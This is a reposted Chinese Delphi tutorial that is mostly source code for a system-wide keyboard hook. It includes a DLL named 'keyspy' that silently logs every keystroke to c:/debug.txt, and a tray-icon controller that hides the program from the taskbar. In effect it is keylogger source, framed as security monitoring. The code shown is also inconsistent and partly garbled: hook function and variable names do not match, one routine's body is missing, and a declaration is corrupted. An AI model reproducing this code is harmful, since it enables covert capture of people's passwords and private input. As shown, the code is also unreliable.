一个例子:转载的<br>利用Hook技术实现键盘监控 利用Hook技术实现键盘监控 <br>乌鲁木齐军医学院 <br>卢立建 <br>---- 在许多系统中,出于安全或其它原因,常常要求随时对键盘进行监控,一个专业的监控程序必须具备两点,一是实时;二是作为指示图标运行。实际应用中把利用Hook(即钩子)技术编写的应用程序添加到Windows的任务栏的指示区中就能够很好的达到这个目的。我在参考了API帮助文档基础上,根据在Delphi开发环境中的具体实现分别对这两部分进行详细论述。 <br><br>一、Hook(钩子)的实现: <br><br>---- Hook是应用程序在Microsoft Windows 消息处理过程中设置的用来监控消息流并且处理系统中尚未到达目的窗口的某一类型消息过程的机制。如果Hook过程在应用程序中实现,若应用程序不是当前窗口时,该Hook就不起作用;如果Hook在DLL中实现,程序在运行中动态调用它,它能实时对系统进行监控。根据需要,我们采用的是在DLL中实现Hook的方式。 <br><br>---- 1.新建一个导出两个函数的DLL文件,在hookproc.pas中定义了钩子具体实现过程。代码如下: <br><br>library keyspy;<br>uses<br>windows, messages, hookproc in 'hookproc.pas';<br>exports<br>setkeyhook,<br>endkeyhook;<br>begin<br>nexthookproc:=0;<br>procsaveexit:=exitproc;<br>exitproc:=@keyhookexit;<br>end.<br><br>2.在Hookproc.pas中实现了钩子具体过程:<br>unit hookproc;<br>interface<br>uses<br>Windows, Messages, SysUtils, Controls, StdCtrls;<br>var<br>nexthookproc:hhook;<br>procsaveexit
ointer;<br>function keyboardhook(icode:integer;wparam:wparam;<br> lparam:lparam):lresult;stdcall;export;<br>function setkeyhook:bool;export;//加载钩子<br>function endkeyhook:bool;export;//卸载钩子<br>procedure keyhookexit;far;<br>const<br>afilename='c:/debug.txt';//将键盘输入动作写入文件中<br>var<br>debugfile:textfile;<br>implementation<br>function keyboardhookhandler(icode:integer;wparam:wparam;<br>lparam:lparam):lresult;stdcall;export;<br>begin<br>if icode<0 then<br>begin<br>result:=callnexthookex(hnexthookproc,icode,wparam,lparam);<br>exit;<br>end;<br>assignfile(debugfile,afilename);<br>append(debugfile);<br>if getkeystate(vk_return)<0 then<br>begin<br>writeln(debugfile,'');<br>write(debugfile,char(wparam));<br>end<br>else<br>write(debugfile,char(wparam));<br>closefile(debugfile);<br>result:=0;<br>end;<br>function endkeyhook:bool;export;<br>begin<br>if nexthookproc<>0 then begin<br>unhookwindowshookex(nexthookproc);<br>nexthookproc:=0;<br>messagebeep(0); end;<br>result:=hnexthookproc=0;<br>end;<br>procedure keyhookexit;far;<br>begin<br>if nexthookproc<>0 then endkeyhook;<br>exitproc:=procsaveexit; end;<br>end.<br>---- 二、Win95/98使用任务栏右方指示区来显示应用程序或工具图标对指示区图标的操作涉及了一个API函数Shell_NotifyIcon,它有两个参数,一个是指向TnotifyIconData结构的指针,另一个是要添加、删除、改动图标的标志。通过该函函数将应用程序的图标添加到指示区中,使其作为图标运行,增加专业特色。当程序起动后,用鼠标右键点击图标,则弹出一个菜单,可选择sethook或endhook。 <br><br>unit kb;<br>interface<br>uses<br>Windows, Messages, SysUtils, Classes,<br> Graphics, Controls, Forms,<br>Dialogs,<br>StdCtrls, Menus,shellapi;<br>const<br>icon_id=1;<br>MI_iconevent=wm_user+1;//定义一个用户消息<br>type<br>TForm1 = class(TForm)<br>PopupMenu1: TPopupMenu;<br>sethook1: TMenuItem;<br>endhook1: TMenuItem;<br>N1: TMenuItem;<br>About1: TMenuItem;<br>Close1: TMenuItem;<br>Gettext1: TMenuItem;<br>procedure FormCreate(Sender: TObject);<br>procedure sethook1Click(Sender: TObject);<br>procedure endhook1Click(Sender: TObject);<br>procedure FormDestroy(Sender: TObject);<br>procedure Close1Click(Sender: TObject);<br>private<br>{ Private declarations }<br>nid:tnotifyicondata;<br>normalicon:ticon;<br>public<br>{ Public declarations }<br>procedure icontray(var msg:tmessage); <br>message mi_iconevent;<br>end;<br>var<br>Form1: TForm1;<br>implementation<br>{$R *.DFM}<br>function setkeyhook:bool;external 'keyspy.dll';<br>function endkeyhook:bool;external 'keyspy.dll';<br> <br>procedure tform1.icontray(var msg:tmessage);<br>var<br>pt:tpoint;<br>begin<br>if msg.lparam=wm_lbuttondown then<br>sethook1click(self);<br>if msg.LParam=wm_rbuttondown then<br>begin<br>getcursorpos(pt);<br>setforegroundwindow(handle);<br>popupmenu1.popup(pt.x,pt.y);<br>end;<br>end;<br> <br>procedure TForm1.FormCreate(Sender: TObject);<br>begin<br>normalicon:=ticon.create;<br>application.title:=caption;<br>nid.cbsize:=sizeof(nid);<br>nid.wnd:=handle;<br>nid.uid:=icon_id;<br>nid.uflags:=nif_icon or nif_message or nif_tip;<br>nid.ucallbackmessage:=mi_iconevent;<br>nid.hIcon :=normalicon.handle;<br>strcopy(nid.sztip,pchar(caption));<br>nid.uFlags:=nif_message or nif_icon or nif_tip;<br>shell_notifyicon(nim_add,@nid);<br>SetWindowLong(Application.Handle,<br> GWL_EXSTYLE,WS_EX_TOOLWINDOW);<br>end;<br> <br>procedure TForm1.sethook1Click(Sender: TObject);<br>begin<br>setkeyhook;<br>end;<br> <br>procedure TForm1.endhook1Click(Sender: TObject);<br>begin<br>endkeyhook;<br>end;<br> <br>procedure TForm1.FormDestroy(Sender: TObject);<br>begin<br>nid.uFlags :=0;<br>shell_notifyicon(nim_delete,@nid);<br>end;<br> <br>procedure TForm1.Close1Click(Sender: TObject);<br>begin<br>application.terminate;<br>end;<br>---- 该程序虽然只用了几个shellai函数,但是它涉及到了在Delphi中对DLL的引用、钩子实现、对指示区的操作、用户定义消息的处理、文件的读写等比较重要的内容,我相信这篇文章能对许多Delphi的初学者有所帮助。 <br>---- 该程序在Win98、Delphi4.0中正常运行。 <br><br>